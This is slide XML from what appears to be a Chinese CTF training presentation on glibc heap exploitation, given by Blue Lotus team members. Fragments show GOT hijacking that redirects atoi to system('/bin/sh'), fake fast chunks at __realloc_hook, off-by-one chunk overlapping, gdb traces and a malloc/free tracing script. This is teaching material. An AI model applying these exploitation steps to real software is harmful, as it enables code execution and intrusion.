          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1751363"/>
            <a:ext cx="1088400" cy="249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valid=1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3038" name="Shape 3038"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2000388"/>
            <a:ext cx="1088400" cy="249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3039" name="Shape 3039"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2235463"/>
            <a:ext cx="1088400" cy="249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atoi@got</a:t>
            </a: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Hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3045" name="Shape 3045"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685325" y="2665050"/>
            <a:ext cx="58584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edit_note(7, p64(system)) =&gt; atoi@got=system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atoi("/bin/sh")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6" name="Shape 3046"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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47" name="Shape 3047"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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3048" name="Shape 3048"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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49" name="Shape 3049"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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3050" name="Shape 3050"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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51" name="Shape 3051"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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3052" name="Shape 3052"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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53" name="Shape 3053"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3054" name="Shape 3054"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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55" name="Shape 3055"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551475" y="1986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3056" name="Shape 3056"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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3057" name="Shape 3057"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286275" y="2235413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3058" name="Shape 3058"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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3059" name="Shape 3059"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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3060" name="Shape 3060"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551475" y="22354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3061" name="Shape 3061"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197875" y="1751325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62" name="Shape 3062"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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63" name="Shape 3063"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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64" name="Shape 3064"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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65" name="Shape 3065"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="1502338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066" name="Shape 3066"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="19864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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3067" name="Shape 3067"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="2235413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DDDD..D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3068" name="Shape 3068"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="1751313"/>
            <a:ext cx="1088400" cy="24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69" name="Shape 3069"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1502288"/>
            <a:ext cx="1088400" cy="2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70" name="Shape 3070"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1751313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71" name="Shape 3071"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2000338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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3072" name="Shape 3072"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463075" y="17513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073" name="Shape 3073"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2235413"/>
            <a:ext cx="1088400" cy="2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0x6030a8</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Shape 3074"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688675" y="1103488"/>
            <a:ext cx="120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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3075" name="Shape 3075"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6380175" y="1318450"/>
            <a:ext cx="16350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76" name="Shape 3076"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1502338"/>
            <a:ext cx="1088400" cy="2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3077" name="Shape 3077"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1751363"/>
            <a:ext cx="1088400" cy="249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valid=1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3078" name="Shape 3078"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2000388"/>
            <a:ext cx="1088400" cy="249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3079" name="Shape 3079"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2235463"/>
            <a:ext cx="1088400" cy="249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atoi@got</a:t>
            </a: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3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Shape 30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chunk around __realloc_hook</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3085" name="Shape 30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Shape 3086"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196250" y="2653700"/>
            <a:ext cx="70680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add_note('A' * (0x70 - 8))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delete_note(3)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edit(1, fake_fast_chunk_addr = (long)&amp;_realloc_hook - 0x1b)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7" name="Shape 3087"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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88" name="Shape 3088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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3089" name="Shape 3089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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90" name="Shape 3090"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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3091" name="Shape 3091"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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92" name="Shape 3092"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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3093" name="Shape 3093"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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94" name="Shape 3094"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3095" name="Shape 3095"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944775" y="1531625"/>
            <a:ext cx="10884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96" name="Shape 3096"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944775" y="2015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size=0x88</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3097" name="Shape 3097"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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0x604830</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3098" name="Shape 3098"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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3099" name="Shape 3099"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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0x6048e0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3100" name="Shape 3100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="2264700"/>
            <a:ext cx="1088400" cy="24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0x604970</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3101" name="Shape 3101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944775" y="22647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0x604a00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3102" name="Shape 3102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="1780613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103" name="Shape 3103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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104" name="Shape 3104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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105" name="Shape 3105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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106" name="Shape 3106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944775" y="1780600"/>
            <a:ext cx="1088400" cy="2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3107" name="Shape 3107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563100" y="3452700"/>
            <a:ext cx="7839600" cy="120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x/20x (long)(&amp;__realloc_hook) - 0x1b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0x7ffff7dd1aed &lt;_IO_wide_data_0+301&gt;:   0xfff7dd0260000000     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0x000000000000007f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0x7ffff7dd1afd: 0x4141414141414141      0xfff7a53380414141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0x7ffff7dd1b0d &lt;__realloc_hook+5&gt;:      0x000000000000007f      0x0000000000000000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0x7ffff7dd1b1d: 0x0000000000000000      0x0000000000000000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介绍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284225" y="1152475"/>
            <a:ext cx="65481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杨坤(Kelwin), 清华大学计算机系博士，蓝莲花战队队长，带领战队在国内第一次打入 Defcon CTF 并获得过最高第五名的历史战绩。此外，他还是 GeekPwn2015 大奖得主，拥有429首都网络安全日冠军(2016)，第一届阿里CTF冠军等荣誉。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="14395687754065.png" id="66" name="Shape 66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="41769" l="33465" r="19781" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1110150"/>
            <a:ext cx="1812800" cy="157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42482766465249.jpg" id="67" name="Shape 67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25985" l="33958" r="31454" t="23232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723800" y="2822025"/>
            <a:ext cx="2108525" cy="20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2822025"/>
            <a:ext cx="62691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朱文雷(zTrix), 清华大学计算机系硕士，蓝莲花战队成员，兴趣爱好广泛，对二进制漏洞挖掘利用、密码学算法、安全工具研发都有较深入的研究。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Transfer Instructions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jmp - Unconditional Jump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j[condition] - Conditional Jump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cmp - Compare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call/ret - Function invoke and return</a:t>
            </a:r>
            <a:endParaRP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Shape 3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gdb script</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3113" name="Shape 3113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="3413700" cy="375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*0x400c75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commands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silent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 "malloc(0x%llx)", $rdi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continue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*0x400c7a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commands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silent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 "=0x%llx\n", $rax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continue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*0x40100a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commands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silent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 "free(0x%llx)\n", $rdi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continue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4" name="Shape 3114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3896150" y="1152475"/>
            <a:ext cx="3635400" cy="378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malloc(0x18)=0x604830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malloc(0x88)=0x604850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malloc(0x88)=0x6048e0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malloc(0x88)=0x604970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malloc(0x88)=0x604a00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free(0x604970)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free(0x604850)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malloc(0x88)=0x604970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free(0x604970)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realloc(0x604830)=0x604830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malloc(0x68)=0x604970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malloc(0x78)=0x604a90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free(0x604970)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malloc(0x68)=0x604970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malloc(0x68)=0x6030a8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Shape 3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Off-by-one: extending free chunks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3120" name="Shape 3120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="1669375"/>
            <a:ext cx="1025700" cy="31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21" name="Shape 3121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="1669375"/>
            <a:ext cx="1025700" cy="3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22" name="Shape 3122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="1669375"/>
            <a:ext cx="1025700" cy="3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23" name="Shape 3123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="2415000"/>
            <a:ext cx="1025700" cy="31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24" name="Shape 3124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="2415000"/>
            <a:ext cx="1025700" cy="31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25" name="Shape 3125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="2415000"/>
            <a:ext cx="1025700" cy="3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26" name="Shape 3126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="3201450"/>
            <a:ext cx="1025700" cy="31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27" name="Shape 3127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="3201450"/>
            <a:ext cx="1025700" cy="31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28" name="Shape 3128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="3201450"/>
            <a:ext cx="1025700" cy="3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29" name="Shape 3129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="4030575"/>
            <a:ext cx="1025700" cy="31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30" name="Shape 3130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="4030575"/>
            <a:ext cx="1025700" cy="31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31" name="Shape 3131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="4030575"/>
            <a:ext cx="1025700" cy="31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32" name="Shape 3132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1484150"/>
            <a:ext cx="356100" cy="356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33" name="Shape 3133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1950025"/>
            <a:ext cx="356100" cy="356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34" name="Shape 3134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="2393700"/>
            <a:ext cx="356100" cy="35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35" name="Shape 3135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1519700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Vulnerable Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3136" name="Shape 3136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1974475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Allocated Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3137" name="Shape 3137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="2429250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Free Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3138" name="Shape 3138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016275" y="1669375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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3139" name="Shape 3139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104550" y="2393700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freed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3140" name="Shape 3140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016275" y="3215700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 into B</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3141" name="Shape 3141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777475" y="4030575"/>
            <a:ext cx="2180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chunk is extended</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3142" name="Shape 3142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500775" y="3649850"/>
            <a:ext cx="76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3" name="Shape 3143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300375" y="3697713"/>
            <a:ext cx="2508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size(B) += size(C)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3144" name="Shape 3144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929250" y="3436125"/>
            <a:ext cx="1944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gethostbyname() heap overflow</a:t>
            </a:r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8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Shape 3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Off-by-one: extending allocated chunks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3150" name="Shape 3150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="1669375"/>
            <a:ext cx="1025700" cy="31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51" name="Shape 3151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="1669375"/>
            <a:ext cx="1025700" cy="3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52" name="Shape 3152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="1669375"/>
            <a:ext cx="1025700" cy="3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53" name="Shape 3153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="2415000"/>
            <a:ext cx="1025700" cy="31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54" name="Shape 3154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="2415000"/>
            <a:ext cx="1025700" cy="3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55" name="Shape 3155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="2415000"/>
            <a:ext cx="1025700" cy="3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56" name="Shape 3156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="3201450"/>
            <a:ext cx="1025700" cy="31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57" name="Shape 3157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="3201450"/>
            <a:ext cx="1025700" cy="31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58" name="Shape 3158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3146125" y="3201450"/>
            <a:ext cx="1025700" cy="31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59" name="Shape 3159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="4030575"/>
            <a:ext cx="1025700" cy="31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60" name="Shape 3160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="4030575"/>
            <a:ext cx="2051400" cy="3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61" name="Shape 3161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1484150"/>
            <a:ext cx="356100" cy="356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62" name="Shape 3162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1950025"/>
            <a:ext cx="356100" cy="356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63" name="Shape 3163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="2393700"/>
            <a:ext cx="356100" cy="35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64" name="Shape 3164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1519700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Vulnerable Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3165" name="Shape 3165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1974475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Allocated Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3166" name="Shape 3166"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="2429250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Free Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3167" name="Shape 3167"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852425" y="1669375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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3168" name="Shape 3168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770500" y="2381650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 into B</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3169" name="Shape 3169"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016275" y="3215700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freed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3170" name="Shape 3170"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777475" y="4030575"/>
            <a:ext cx="2180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 larger than B,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overlapped</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
